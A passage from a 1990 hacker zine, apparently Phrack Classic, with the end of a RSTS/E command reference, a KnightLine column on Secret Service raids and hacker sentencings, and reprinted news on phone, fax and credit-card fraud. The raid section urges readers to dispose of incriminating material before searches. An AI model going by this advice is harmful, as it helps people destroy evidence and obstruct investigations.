  4682. the /DEFAULT qualifier.
  4683.  
  4684. *SET QUEUE/ENTRY
  4685. The SET QUEUE/ENTRY command changes the status of a file that is queued
  4686. for printing or for batch job execution but is not yet processed by the
  4687. system.
  4688.  
  4689. Format
  4690.  
  4691. SET QUEUE/ENTRY=sequence-number  [queue-name[:]]
  4692.  
  4693.     Additional
  4694. Command Qualifiers                  Defaults
  4695.  
  4696.    /AFTER=date-time                 none
  4697.    /BATCH
  4698.    /FORMS=type
  4699.    /HOLD
  4700.    /JOB_COUNT=n
  4701.    /PRIORITY=n
  4702.    /RELEASE
  4703.  
  4704. If you do not specify a queue name, LP0: is assumed.
  4705.  
  4706. See also:  DELETE/ENTRY, SET QUEUE/JOB
  4707.  
  4708. *SET QUEUE/JOB
  4709.  
  4710. The SET QUEUE/JOB command uses the name of a job to modify the status
  4711. of a file that is queued for a printer or batch queue.
  4712.  
  4713. Format
  4714.  
  4715. SET QUEUE/JOB=job-name [queue-name[:]]
  4716.  
  4717. Command Qualifiers                  Defaults
  4718.  
  4719.    /AFTER=date-time                 None.
  4720.    /BATCH
  4721.    /FORMS=type
  4722.    /HOLD
  4723.    /JOB_COUNT=n
  4724.    /PRIORITY=n
  4725.    /RELEASE
  4726.  
  4727. When you submit a batch job or issue the PRINT command, the job is
  4728. assigned a name, according to the first input file specification or
  4729. the name you specify.  You can use this name to modify the status of
  4730. the job in the queue.
  4731.  
  4732. See also:  DELETE/JOB, SET QUEUE/ENTRY
  4733.  
  4734. *SET TERMINAL
  4735. The SET TERMINAL command lets you specify the characteristics of your
  4736. terminal. Privileged users can also set the characteristics of other
  4737. terminals.
  4738.  
  4739. Format
  4740.  
  4741. SET TERMINAL [device-name[:]]
  4742.  
  4743. Command Qualifiers                  Defaults
  4744.  
  4745.    /[NO]BROADCAST                   /NOBROADCAST
  4746.    /CRFILL[=n]                      /CRFILL=0
  4747.    /[NO]ECHO                        /ECHO
  4748.    /[NO]HARDCOPY
  4749.    /LA34
  4750.    /LA36
  4751.    /LA38
  4752.    /LA120
  4753.    /[NO]LOWERCASE
  4754.    /PARITY=EVEN                     /NOPARITY
  4755.            ODD
  4756.    /NOPARITY
  4757.    /[NO]SCOPE
  4758.    /SPEED=n
  4759.    /SPEED=(i,o)
  4760.    /[NO]TAB                         /NOTAB
  4761.    /[NO]TTSYNC                      /TTSYNC
  4762.    /[NO]UPPERCASE
  4763.    /VT05
  4764.    /VT52
  4765.    /VT55
  4766.    /VT100
  4767.    /WIDTH=n
  4768.  
  4769. See also:  SHOW TERMINAL
  4770.  
  4771. *SHOW DEVICES
  4772. The SHOW DEVICES command displays the status of devices
  4773. that have disks mounted on them or that are allocated to jobs.
  4774.  
  4775. See also:  MOUNT, ALLOCATE
  4776.  
  4777. *SHOW QUEUE
  4778. The SHOW/QUEUE command displays a list of entries in the printer
  4779. and/or batch job queues.
  4780.  
  4781. Format
  4782.  
  4783. SHOW QUEUE [queue-name[:]]
  4784.  
  4785. Command Qualifiers
  4786.  
  4787.    /BATCH
  4788.    /BRIEF
  4789.  
  4790. Queue: queue-name[:]
  4791.  
  4792. To display the queue of your system's default printer, type:
  4793.  
  4794. $ SHOW QUEUE
  4795.  
  4796. If there are no files in the queue, RSTS/E prints a message
  4797. similar to:
  4798.  
  4799. LP0 queue is empty
  4800.  
  4801. *SHOW NETWORK
  4802. The SHOW NETWORK command displays the systems you can connect
  4803. to by the network. If the network is operational, RSTS/E displays
  4804. the names of different nodes that your system can access.
  4805.  
  4806. Format
  4807.  
  4808. SHOW NETWORK
  4809.  
  4810. See also:  SET HOST
  4811.  
  4812. *SHOW SYSTEM
  4813. The SHOW SYSTEM command displays information about use of the
  4814. system's resources. Specifically, it displays information about
  4815. the status of all jobs, attached and detached, in use on the system.
  4816.  
  4817. Format
  4818.  
  4819. SHOW SYSTEM
  4820.  
  4821. The only difference between SHOW SYSTEM and SHOW USERS is that the
  4822. SHOW SYSTEM command includes information about the status of detached
  4823. jobs.
  4824.  
  4825. See also:  SHOW USERS
  4826.  
  4827. *SHOW TERMINAL
  4828. The SHOW TERMINAL command displays the characteristics of your
  4829. terminal. Most of these characteristics can be changed with a
  4830. corresponding option of the SET TERMINAL command. (Users with
  4831. privileged accounts can display the characteristics of other terminals.)
  4832.  
  4833. Format
  4834.  
  4835. SHOW TERMINAL [device-name[:]]
  4836.  
  4837. See also:  SET TERMINAL
  4838.  
  4839. *SHOW USERS
  4840. The SHOW USERS command displays information about the status of
  4841. attached jobs on the system.
  4842.  
  4843. Format
  4844.  
  4845. SHOW USERS
  4846.  
  4847. See also:  SHOW SYSTEM
  4848.  
  4849. *SUBMIT
  4850. The SUBMIT command enters one or more control files for batch processing.
  4851.  
  4852. Format
  4853.  
  4854. SUBMIT file-spec[,...]
  4855.  
  4856. Command Qualifiers                  Defaults
  4857.  
  4858.    /AFTER=date-time
  4859.    /NAME=job-name
  4860.    /PRIORITY=n                     /PRIORITY=128
  4861.    /QUEUE=quename
  4862.  
  4863. File Qualifiers                     Defaults
  4864.  
  4865.    /[NO]DELETE                      /NODELETE
  4866.  
  4867. Prompts
  4868.  
  4869. File: file-spec[,...]
  4870.  
  4871. See also:  DELETE/JOB, SET QUEUE/JOB
  4872.  
  4873. *TYPE
  4874. The TYPE command displays the contents of a text file (as opposed
  4875. to a binary or temporary file).
  4876.  
  4877. Format
  4878.  
  4879. TYPE [node::]file-spec[,...]
  4880.  
  4881. Command Qualifiers                  Defaults
  4882.  
  4883.    /OUTPUT=file-spec                /OUTPUT=KB:
  4884.    /[NO]QUERY                       /NOQUERY
  4885.  
  4886. Prompts
  4887.  
  4888. File: file-spec[,...]
  4889.  
  4890. To temporarily halt the display of a file, use <CTRL/S>.  To resume
  4891. output where it was interrupted, use <CTRL/Q>. (On a VT100 terminal
  4892. you can also press the NO SCROLL key to stop and restart output.)
  4893.  
  4894. To suppress the display but continue command processing, use <CTRL/O>.
  4895. If you press <CTRL/O> again before processing is completed, output
  4896. resumes at the current point in command processing.
  4897.  
  4898. To stop command execution entirely, press <CTRL/C>.  The use of
  4899. <CTRL/C> returns you to DCL command level.
  4900.  
  4901. See also:  COPY
  4902.  
  4903. ------------------------------------------------------------------------------
  4904.  
  4905. Hope that this file brought back memories for you guys.  It did for me! 8^]
  4906.  
  4907.                                                    Crimson Death
  4908. _______________________________________________________________________________
  4909.  
  4910.                               ==Phrack Classic==
  4911.  
  4912.                      Volume Three, Issue 32, File #10 of 12
  4913.  
  4914.  
  4915.                         KL ^*^ KL ^*^ KL ^*^ KL ^*^ KL
  4916.  
  4917.                               K N I G H T L I N E
  4918.  
  4919.                               Issue 001 / Part I
  4920.  
  4921.                             17th of November, 1990
  4922.  
  4923.                               Written, compiled,
  4924.  
  4925.                            and edited by Doc Holiday
  4926.  
  4927.                         KL ^*^ KL ^*^ KL ^*^ KL ^*^ KL
  4928.  
  4929.                                       ---
  4930.  
  4931.     Welcome to the 5th year of Phrack and the first edition of KnightLine!
  4932.  
  4933.                                       ---
  4934. SunDevil II: The witch-hunt continues..
  4935.  
  4936. I hate to start out on such a sour note, but:  Inside sources have reported an
  4937. enormous amount of Secret Service activity in major U.S.  cities.
  4938. Furthermore, sources claim that new investigations are underway for the
  4939. prosecution of all Legion Of Doom members.
  4940.  
  4941. The investigations have "turned up" new evidence that could bring about
  4942. the sequel to SunDevil.
  4943.  
  4944. This information comes from reliable sources and I suggest that all precautions
  4945. should be taken to protect yourselves from a raid.
  4946.  
  4947. Some good advice to follow:
  4948.  
  4949. A>   Refrain from using "codes", or other means to commit toll fraud.
  4950.  
  4951. B>   Further yourselves from those who are overwhelmed with desire to tell
  4952.      you their recent conquests of computer systems.
  4953.  
  4954. C>   Refrain from downloading or storing stolen Unix source code.
  4955.  
  4956. D>   Get rid of anything that might incriminate you or your peers.
  4957.  
  4958. E>   Stay cool, calm, and collected.
  4959.  
  4960.  
  4961. The Conflict has submitted a file to KL about what to do IF YOU ARE raided.
  4962.  
  4963. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  4964.  
  4965.                  Simple Guidelines To Follow If You Encounter
  4966.                Law Enforcement Agents In An Unfriendly Situation
  4967.  
  4968.      The current state of the Computer Underground is an extreme turmoil.
  4969.      The recent threat of another series of witchhunt raids has put many
  4970.      people into a state of paranoia, and rightfully so.  Noone needs to
  4971.      deal with all the bullshit associated with a bust.  I am offering a
  4972.      few guidelines to follow if you encounter a precarious situation
  4973.      instigated by a law enforcement agent; of course, it is up to you to
  4974.      decide what you want to do.  Of the people whom I have spoken with,
  4975.      these will be some of the best steps to follow if you receive an
  4976.      unexpected visit.
  4977.  
  4978.           Probably the first thing you would want to do if you receive an
  4979.      unfriendly visit from Joe Fed is to READ the damn warrant.  Find
  4980.      out why you have been chosen, and what they are looking for.  Also,
  4981.      remember that if they have only a search and seizure warrant, they
  4982.      are warranted only to confiscate items on your premises; however, if
  4983.      they are serving a subpoena, they may take what they need, on or off
  4984.      your premises.  So, in essence, the clean-house preventive measure
  4985.      may or may not be useful to you.
  4986.  
  4987.           An important thing to do when Agent Foley (or one of his lesser
  4988.      evil counterparts) comes knocking on your door is to cooperate fully.
  4989.      Drop a lot of "Yes sir"/"No sir" answers; respond politely.  You're
  4990.      in no position to be a smart ass, and being friendly surely can not
  4991.      hurt you.
  4992.  
  4993.           Another important thing to remember, although it is almost
  4994.      opposite of the aforementioned, has to do with what to say.  In
  4995.      essence, do not say a fucking thing if you are questioned!  Remember,
  4996.      anything you say or do can and WILL be used AGAINST you in a court of
  4997.      law.  Simply reply, "I can not answer any questions without counsel",
  4998.      or "I first must contact my attorney."  You need not answer a damn
  4999.      thing they ask of you without an attorney present, and it would most
  5000.      probably be very detrimental to do so.
  5001.  
  5002.           This hint parallels the previous one.  No matter what you do,
  5003.      do not reply to any question with "I don't know anything", or any
  5004.      simple derivation of that phrase.  If you do, and you are indicted,
  5005.      you will be reamed in court.  The presence of that statement could
  5006.      greatly damage your defense, unless you are conditionally mental or
  5007.      something.
  5008.  
  5009.           In essence, those are all you should need.  What I have outlined
  5010.      is very simple, but logical.  You need to keep a level head at least
  5011.      while they are on site with you; get pissed off/psycho later, after
  5012.      they leave.  If you are currently an active member of the Computer
  5013.      Underground, you may wish to lose anything that is important to you,
  5014.      at least temporarily.  Why?  Well, the analogy I was given follows
  5015.      that:  if you were suspected of racketeering, the feds could execute
  5016.      a search and seizure on your property.  If they can prove by 51% that
  5017.      ANY of the confiscated material COULD have been used in your suspected
  5018.      racketeering, it is forfeited (i.e. you lost it, for good).  The
  5019.      forfeiture stands whether or not you are indicted or convicted!  So,
  5020.      you would be entirely screwed.
  5021.  
  5022.      All of the aforementioned steps are important.  Those are all I really
  5023.      have to offer.  I suggest that you get clean before the sweep occurs,
  5024.      and that you stay clean until after the sweep clears.  Exercise
  5025.      extreme caution.  Keep your head high, and keep your back to the wall
  5026.      (otherwise, it would be quite possible to find a knife lodged in it).
  5027.      Stay safe, and good luck!
  5028.  
  5029.      The Conflict
  5030.       11-13-1990
  5031.  
  5032. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  5033. ***UPDATE.11/16/90:  3 Hackers are DOOMED to prison
  5034.  
  5035.      Frank Darden (Leftist), Adam Grant (Urvile), and Robert Riggs (Prophet)
  5036. were sentenced Friday.  Robert, who was currently on probation before the
  5037. incident was sentenced to 21 months in a federal prison.  Frank and Adam were
  5038. received sentences of 14 months.  All three were ordered to pay $233,000 in
  5039. restitution.
  5040.  
  5041.      Kent Alexander, an assistant U.S. attorney who prosecuted the case, was
  5042. not available for comment.
  5043.  
  5044.                                       ---
  5045.      This is not good for the Underground at all.  I'm sure the government will
  5046. use the outcome of this to their advantage in speeding up the momentum of
  5047. prosecuting hackers.  In their eyes, everyone is in LOD.
  5048.  
  5049.      Dale Boll, a special agent of the Secret Service in Washington, said
  5050. "Telephone companies are preparing for a retaliation from the hacking
  5051. underworld and are beefing up security at all ends of the wire."
  5052.  
  5053.      I can't verify or validate these rumors of retaliation.  But I can say if
  5054. you are going to do some sort of retaliation, I would think twice-- It could
  5055. make things worse.  This is not a "game" we are playing.  No, it's reality.
  5056. And I'm sured Frank, Adam, and Rob are feeling it right now.
  5057.                                       ---
  5058. A few words from Erik Bloodaxe on the sentences:
  5059.  
  5060. "I'm not surprised in the least at the sentencing.  However, I'm sure the three
  5061. of them are.  I wish I could ask them if all the singing was worth-while in the
  5062. long-run.  How can anyone hope to make a deal with federal officals, who with
  5063. in the past year, resorted to such lies and deceit.  Everyday I think all this
  5064. will be over and I can get on with my life and possibly use my own computer to
  5065. write a term paper without fear of it's confiscation due to who or what I know
  5066. or have seen or done in the past.  Perhaps this will end eventually, but until
  5067. then Mr.  Cook will play on the peoples inherient fear of technology and
  5068. exploit everyone in his past on his personal crusade for his own twisted view
  5069. of justus.  Are you or have you ever been a member of the Legion of Doom?  Tell
  5070. me, do you believe in reincarnation Senator McCarthy?"
  5071.  
  5072. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  5073.  
  5074.             "The weirdest part of my dream was... when I woke up."
  5075.  
  5076.                           And now.... .. ANNOUNCING:
  5077.  
  5078.                                The first annual,
  5079.  
  5080.                               X M A S C O N  '90
  5081.  
  5082.                               Where: Houston, TX
  5083.                          When: December 28th-30th 1990
  5084.                Who: All Hackers, Journalists, and Federal Agents
  5085.  
  5086.      Well, it's getting closer.. XmasCon is next month and we plan on having
  5087. the biggest gathering of Hackers & Feds since SummerCon '88!
  5088.  
  5089.      This event was going to be private until word got out.  A journalist
  5090. (unnamed) found out about the private event and decided to make it public news
  5091. in the magazine for which he writes.  Well, after seeing the words: "XMASCON"
  5092. in a magazine with less readers than Phrack, we decided to announce it
  5093. ourselves.  So, here it is-- Your OFFICIAL invitation to the gathering that
  5094. should replace the painful memories of SummerCon'90 (SCon'90? What do you mean?
  5095. there was a SummerCon this year? HA. It surprised me too).
  5096.  
  5097.                               Hotel Information:
  5098.                                  La Quinta Inn
  5099.                                6 North Belt East
  5100.                                 (713) 447-6888
  5101.                   (Located next to Intercontinental Airport)
  5102.  
  5103.                        Fees: $44.00+TAX a night (single)
  5104.                           $56.00+TAX a night (double)
  5105.  
  5106.                          Government Discount (With ID)
  5107.                           $49.00+TAX a night (single)
  5108.                           $37.00+TAX a night (double)
  5109.  
  5110.                                 1-800-531-5900
  5111.  
  5112.  
  5113. Call for reservations in advance.  Please tell the registar that you are with
  5114. XmasCon'90.  Everyone is welcome to attend, and I do mean EVERYONE.
  5115.  
  5116.  
  5117. Take care & see you at HoHoCon!
  5118.  
  5119.                    --DH
  5120.  
  5121. _______________________________________________________________________________
  5122.  
  5123.                            F R O M   T H E   W I R E
  5124.  
  5125.  
  5126. HEADLINE  Thirteen Arrested For Breaking Into University Computer
  5127.           Byline:   PAT MILTON
  5128. DATE      08/16/90
  5129. SOURCE    The Associated Press (ASP)
  5130.           Origin:   FARMINGDALE, N.Y.
  5131.           (Copyright 1990.  The Associated Press.  All Rights Reserved.)
  5132.  
  5133.  
  5134. * FARMINGDALE, N.Y.  (AP) _ Thirteen computer hackers ranging in age from 14 to
  5135. 32 were charged Thursday with breaking into the mainframe computer at a
  5136. university in Washington state and causing costly damage to the files.  One of
  5137. the suspects is a 14-year-old high school student from New York City who is
  5138. also a suspect in last November's break-in of an Air Force computer in the
  5139. Pentagon, according to Senior Investigator Donald Delaney of the New York State
  5140. Police.  The student, who used the name "Zod" when he signed onto the computer,
  5141. is charged with breaking into the computer at the City University of Bellevue
  5142. in Washington in May by figuring out the toll-free telephone number that gave
  5143. students and faculty legitimate  access to the system.
  5144.  
  5145. "Zod," who was not identified because he is a minor, maintained control over
  5146. the system by setting up his own program where others could illegally enter the
  5147. system by answering 11 questions he set up.
  5148.  
  5149. More than 40 hackers across the country are believed to have gained illegal
  5150. access to the system since May, Delaney said.  As a result of the break-in,
  5151. university files were altered and deleted, and consultants must be hired to
  5152. reprogram the system, Delaney said.  In addition to the arrests, search
  5153. warrants were executed at 17 locations on Thursday where officers confiscated
  5154. $50,000 worth of computers and related equipment.  Three more arrests were
  5155. expected.  Two of the 13 arrested were from Long Island and the rest were from
  5156. the New York boroughs of Brooklyn, Queens, Manhattan and the Bronx.
  5157. Farmingdale is on Long Island.  The 13 were charged with computer tampering,
  5158. computer trespass, unauthorized use of a computer and theft of services.  The
  5159. juveniles will be charged with juvenile delinquency.
  5160.  
  5161. The investigation began two months ago after a technician at the university
  5162. noticed "error message" flashing on the computer screen, indicating someone had
  5163. entered the system illegally.  The suspects were traced through subpoenaed
  5164. telephone records.  * Many hackers break into private computer systems for the
  5165. pure satisfaction of cracking the code, and also to obtain sometimes costly
  5166. computer programs, Delaney said.
  5167. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  5168.  
  5169.  
  5170.  
  5171. _______________________________________________________________________________
  5172.  
  5173.  
  5174. HEADLINE  US Sprint helps business customers battle PBX fraud
  5175. DATE      09/25/90
  5176. SOURCE    BUSINESS WIRE (BWR)
  5177.  
  5178.  
  5179. KANSAS CITY, Mo.--(BUSINESS WIRE)--US Sprint Wednesday announced its corporate
  5180. security department will help the company's business customers battle PBX
  5181. fraud.  After producing significant results in fighting code abuse US Sprint is
  5182. directing their efforts to help their business customers in identifying and
  5183. preventing computer hackers from infiltrating their business customer's owned
  5184. or leased telephone switching equipment.  ``Unauthorized use of our
  5185. long-distance service has been greatly reduced through increased detection,
  5186. prevention, investigation and prosecution efforts,'' said Bob Fox, US Sprint
  5187. vice president corporate security.
  5188.  
  5189. ``Now rather than attacking a long-distance carrier's network in * an attempt
  5190. to steal authorization codes, computer hackers are attacking private companies'
  5191. and governmental agencies' Private Branch Exchanges (PBX's).  Computer
  5192. hackers break into private telephone switches in an attempt to reoriginate
  5193. long-distance calls, which are then billed to the businesses.  Fox says a
  5194. business may not discover its telephone system has been ``hacked'' until their
  5195. long-distance bill is received and then it may be too late.  Help is on the way
  5196. however.  US Sprint has started a customer support program to help the
  5197. company's business customers to combat the situation.  Del Wnorowski, US Sprint
  5198. senior vice president-general counsel said, ``The new program is customers
  5199. about the potential for telecommunications fraud committed through their owned
  5200. or leasesd switching equipment and to assist them in preventing this type of
  5201. illegal activity.'' US Sprint is a unit of United Telecommunications Inc., a
  5202. diversified telecommunications company headquartered in Kansas City.
  5203.  
  5204. CONTACT:
  5205. US Sprint, Kansas City.
  5206. Phil Hermanson, 816/276-6268
  5207. _______________________________________________________________________________
  5208.  
  5209.  
  5210. HEADLINE  Fax pirates find it easy to intercept documents
  5211. DATE      09/10/90
  5212. SOURCE    Toronto Star   (TOR)
  5213.           Edition:  METRO
  5214.           Section:  BUSINESS TODAY
  5215.           Page:     B4
  5216.           (Copyright The Toronto Star)
  5217.  
  5218.  
  5219.           ---      Fax pirates find it easy to intercept documents         ---
  5220.  
  5221. TOKYO (Special) - Considering that several years ago enthusiastic hackers began
  5222. breaking into computer systems worldwide to steal valuable information, it
  5223. could only have been a matter of time before the same problem surfaced for
  5224. facsimile machines.  Now, officials of Nippon Telegraph and Telephone Public
  5225. Corp.  report evidence that this has been happening, not only in their own
  5226. country but around the globe.  Apparently, anyone with just a little knowledge
  5227. of electronics can tap fax messages being sent from one of these relatively
  5228. unsophisticated machines to another, with the duplication printed out on the
  5229. pirate's facsimile machine.  Both the sender and the receiver of the faxed
  5230. document remain completely unaware that they have been bugged.  "I shudder to
  5231. think of some of the business documents which only recently moved over my
  5232. company's fax machines being examined by our competitors," one Tokyo executive
  5233. nervously admits when informed that there has been a proliferation of tapping.
  5234. "You don't think the tax people are doing it too?" he then asks in mock terror.
  5235.  
  5236.      It is certainly a frightening thought.  The technique involves making a
  5237. secret connection with the telephone line of the party whose fax messages are
  5238. to be intercepted.  That is all too easy to accomplish, according to officials
  5239. of Nippon Telegraph and Telephone.  Apart from a few special cases, very little
  5240. has been done to guard against outside tapping.  As a result, one of the most
  5241. vulnerable areas - and one most businessmen and women now should begin to feel
  5242. unsure of - is the privacy or security of the facsimile machine.  Technical
  5243. attention to this problem is in order.
  5244.  
  5245.      "The idea that somewhere out there is 'Conan the Hacker' who is reading my
  5246. fax correspondence as readily as I do sends chills up my spine," says one
  5247. American businesswoman here.  "There could be a lot of trouble for me and up to
  5248. now I didn't even realize it was possible." It is not only possible, but easy.
  5249. Ordinary components available at any electronics store can be used.  With these
  5250. in hand, tappers can rig up a connection that sets off a warning signal,
  5251. without the sender or receiver realizing it, whenever a fax message passes
  5252. along the telephone line.  Considering the growing volume of highly
  5253. confidential material being sent and received via fax equipment, the resulting
  5254. leaks can be considered highly dangerous to the security of corporate
  5255. information.
  5256.  
  5257.      In Japan alone it is estimated that there are 3.7 million
  5258. machines in operation.  Given the nature of these tapping operations, it would
  5259. appear to be extremely difficult for companies to determine whether they are
  5260. suffering serious damage from this process.  In addition, it is clear that a
  5261. great many corporations have yet to realize the extent of the threat to their
  5262. privacy.  "If more business executives recognized what is going on," suggests
  5263. one Japanese security specialist, "they would move now to halt the opportunity
  5264. for leaks and thus protect their corporations from this type of violation." He
  5265. went on to note that third parties mentioned in fax messages also can be badly
  5266. hurt by these interceptions.  Fortunately, manufacturers are producing machines
  5267. capable of preventing hackers from tapping into the system.  In some cases,
  5268. newly developed fax machines use code systems to defend information
  5269. transmitted.  But these tap-proof facsimile machines are not yet in general
  5270. use.  Makers of the new "protected" facsimile machines predict that once the
  5271. business communities around the globe become aware of the threat they will
  5272. promptly place orders for replacements and junk their old equipment as a simple
  5273. matter of damage control.  The market could prove extremely large.  Those few
  5274. leak-proof fax machines now in operation depend upon scrambling messages, so
  5275. that even if a pirate taps into the telephone line leading to the unit, the
  5276. intercepted message is impossible to read.
  5277.  
  5278.      Nippon Telegraph and Telephone, for example, claims that it would require
  5279. a hacker using a large computer more than 200,000 years to crack the codes used
  5280. in its own pirate-proof fax.  This ultimately may prove to be something of an
  5281. exaggeration.  Although in Japan and many other countries this kind of tapping
  5282. clearly is illegal, it remains nearly impossible to track down electronic
  5283. eavesdroppers.  As far as is known, none of these snoopers have been identified
  5284. and dragged into court.  Security specialists in Japan claim that there may be
  5285. thousands of fax hackers who get their kicks out of intercepting and reading
  5286. other people's business mail, with few using the information for illegal
  5287. purposes or actively conveying it to third parties.
  5288. _______________________________________________________________________________
  5289.  
  5290.  
  5291. HEADLINE  Inmate behind scams
  5292.           Byline:   JOHN SEMIEN
  5293. DATE      09/11/90
  5294. SOURCE    THE BATON ROUGE SUNDAY ADVOCATE   (BATR)
  5295.           Section:  NEWS
  5296.           Page:     1-B
  5297.           (Copyright 1989 by Capitol City Press)
  5298.  
  5299.  
  5300.      There wasn't much inmate Lawrence "Danny" Faires couldn't buy, sell or
  5301. steal with a telephone call from his jail cell in Miami when his million-dollar
  5302. fraud ring ran afoul of the U.S.  Secret Service in 1989.  That was the year
  5303. Faires used a portable computer with an automatic dialing program to "hack out"
  5304. access codes to the long-distance lines of Telco Communications Inc., a Baton
  5305. Rouge-based phone company.  Telco officials were alarmed when they spotted
  5306. 1,500 attempts at gaining unauthorized access to the company's long-distance
  5307. service in a single 12-hour period in January 1989.
  5308.  
  5309.      Convinced that an organized fraud scheme was at work, Telco called
  5310. Resident Agent Phil Robertson, who heads the service's Baton Rouge office.
  5311.  
  5312. "They told me they felt they were being attacked by hackers who had discovered
  5313. their long-distance access lines and who were hacking out personal
  5314. identification numbers belonging to their customers," Robertson said Monday.
  5315.  
  5316. "You are billed based on your pin (access) number.  The computer hacker had
  5317. located several of their 800 numbers and had entered digits hoping it would be
  5318. a valid pin number." Using computer records, Robertson said agents were able to
  5319. isolate 6,000 fraudulent Telco calls that were made during a three-week period
  5320. of January.  More than a third of those calls were traced to a cell block in
  5321. the Dade County Interim Detention Center that has been home for Faires for the
  5322. past four years.  Faires is awaiting trial in Miami on first-degree murder
  5323. charges.  "As it turned out, all of the inmates in this cell block are awaiting
  5324. trial," Robertson said.  "One of the inmates, Danny Faires, had a computer in
  5325. his cell attached to a modem, and he turned out to be the hacker."
  5326.  
  5327. "All he had to do was plug his modem in, let it make the calls and check his
  5328. printout for the numbers that came back good," the agent said.  In checking out
  5329. the other bogus Telco calls, agents uncovered a massive credit card scam.  A
  5330. federal grand jury in Milwaukee, Wis., linked both scams to Faires and alleged
  5331. associates of the inmate across the country in a Feb.  27 indictment of six
  5332. people on federal wire and access device fraud.  Fairies, an unindicted
  5333. co-conspirator in the case, last week said he has spent the past three years
  5334. applying his previous experience as a computer systems analyst and programmer
  5335. to a lap-top, portable computer provided by one of the prison guards.  He
  5336. describes the results as "doing business with America" at the expense of large
  5337. credit card and telecommunications companies.  Faires said he attacked Telco's
  5338. system by chance after receiving one of the company's access numbers in a group
  5339. of assorted access codes acquired by his associates.  "It was just their
  5340. misfortune that we became aware that they had a system there that was easily
  5341. accessible," Faires said in a telephone interview.
  5342.  
  5343.      "I was given their access number, along with Sprint and MCI, I guess
  5344. virtually every company in America we got." Faires said he used the stolen,
  5345. long distance phone time and other stolen credit card numbers to access
  5346. networks with credit information from major department stores and mail order
  5347. businesses.  "You come up to the door and the door is locked," he said.  "You
  5348. have to buy access.  Well, I bought access with credit cards from another
  5349. system.  I had access codes that we had hacked.  "I could pull your entire
  5350. credit profile up and just pick the credit card numbers that you still had some
  5351. credit in them and how many dollars you had left in your account and I would
  5352. spend that," Faires said.  "My justification was, I don't know the creditor and
  5353. he had no knowledge of it so he won't have to pay it." However, Faires said he
  5354. now thinks of the trouble the illegal use of the credit cards has caused his
  5355. victims in their efforts to straighten out damaged credit records.  "I remember
  5356. I took a course once that was called computer morality about the moral ethics
  5357. to which we're morally bound," he said.  "It's like a locksmith.  Even though
  5358. he can open a lock, he's morally bound not to if it's not his lock.  I violated
  5359. that."
  5360.  
  5361.      The vulnerability of credit card companies to hackers is the subject of an
  5362. unpublished book that Faires said he has written.  Faires said his book
  5363. includes tips on how businesses and others can safeguard access to their
  5364. credit, but added that there may be no way to be completely safe from
  5365. hackers.  "It's untitled as yet," he said about the book.  "We're leaving that
  5366. open.  I'm waiting to see if they electrocute me here, then I'm going to put
  5367. something about "I could buy it all but couldn't pay the electric bill.' "
  5368. [This guy is a real toon -DH]
  5369.  
  5370.      While Faires has not been formally charged in connection with the scheme,
  5371. last week he said he was sure charges will be forthcoming because "there is no
  5372. question about my involvement." The other six alleged conspirators are John
  5373. Carl Berger and George A.  Hart Jr.  of Milwaukee, Wis.; Charles Robert McFall
  5374. and Victor Reyes of San Antonio, Texas; Steven Michael Skender Jr.  of West
  5375. Allis, Wis.; and Angelo Bruno Bregantini of Marshville, N.C.  All six men are
  5376. charged with conspiracy to commit access device and wire fraud.  Berger,
  5377. Skender, Reyes and Bregantini also are charged separately with multiple counts
  5378. of wire fraud.
  5379.  
  5380.      The indictments are the first criminal charges generated by Operation
  5381. Mongoose, an ongoing Secret Service probe of credit card and long-distance
  5382. telephone access fraud.  The charges allege that Faires has had access to a
  5383. telephone since his arrest and imprisonment in Miami in 1986, an allegation
  5384. that has prompted a separate probe by Miami authorities.  That phone was used
  5385. to make frequent calls to a building on Brookfield Road in Brookfield, Wis.,
  5386. where another alleged unindicted co-conspirator, Fred Bregantini, operates
  5387. various businesses, according to the indictment.  The indictment said Faires
  5388. and Fred Bregantini were "at the hub" of the telephone and credit card scam.
  5389. The two men are accused of collecting credit card numbers and telephone access
  5390. codes from other defendants in the case and using the numbers to purchase
  5391. merchandise, services and "other things of value." Robertson said agents
  5392. believe the members of the ring copied many of these stolen numbers from credit
  5393. card receipts retrieved from the trash cans of various businesses.  He said the
  5394. practice, commonly called "dumpster diving," is a widely used method in credit
  5395. card fraud. [`dumpster  diving' eh? -DH]
  5396.  
  5397.      While some of the defendants helped make purchases on the stolen cards,
  5398. the indictment alleges that others provided addresses used for the shipment of
  5399. the stolen goods.  The goods included gold coins, plane tickets, computer
  5400. equipment, tools and stereo equipment.  Robertson said agents are still
  5401. tallying the cost of the scam to Telco and other companies but that the damage
  5402. has already climbed past $1 million.  Herbert Howard, president of Telco, on
  5403. Friday said the company lost from $35,000 to $40,000 in revenues from illegal
  5404. calls and in additional expenses for researching Faires' use of access codes.
  5405. "It was really a learning experience for us because this is the first time this
  5406. has happened," Howard said about his 2-year-old company.  "I think it's a fear
  5407. of all long-distance companies.  It's very fortunate that we caught it as
  5408. quickly as we did."
  5409. _______________________________________________________________________________
  5410.  
  5411. HEADLINE  No, I'm not paranoid, but who is No. 1?
  5412.           Byline:   DENISE CARUSO
  5413.           Column:   INSIDE SILICON VALLEY
  5414. DATE      08/21/90
  5415. SOURCE    SAN FRANCISCO EXAMINER   (SFEX)
  5416.           Edition:  FIFTH
  5417.           Section:  BUSINESS
  5418.           Page:     D-16
  5419.           (Copyright 1989)
  5420.  
  5421.  
  5422.      THOUGH I didn't plan it that way, this week proved to be a perfect time to
  5423. start renting old episodes of "The Prisoner" - that very dark, very paranoid
  5424. British spy series from the early '60s which foresaw a bleak future in which
  5425. "een-formation" was of paramount importance, no matter whose "side" you were
  5426. on.  Every well-paid company representative from every telephone service
  5427. provider in North America earned his or her keep this week, fielding calls from
  5428. blood-thirsty members of the press corps who also wanted "een-formation" about
  5429. whether or not the huge long-distance snafu with AT&T was a "hack" (an illegal
  5430. break-in) or some form of computerized germ warfare.
  5431.  
  5432.      I'm happy that the answer was "no," but of course the event opens a rather
  5433. nasty can of worms:  has AT&T's problem tipped off the hacker community that
  5434. the phone network is vulnerable?  "That's a very good question," said one
  5435. network engineer I spoke with last week.  But, he assured me, his network was
  5436. totally secure and had all kinds of safeguards built in to prevent either
  5437. outside penetration or the introduction of a software virus to the system.  I
  5438. hope he's right, but I must admit, I've heard that song before.
  5439.  
  5440.      Here, for example, is an excerpt from an anonymous piece of electronic
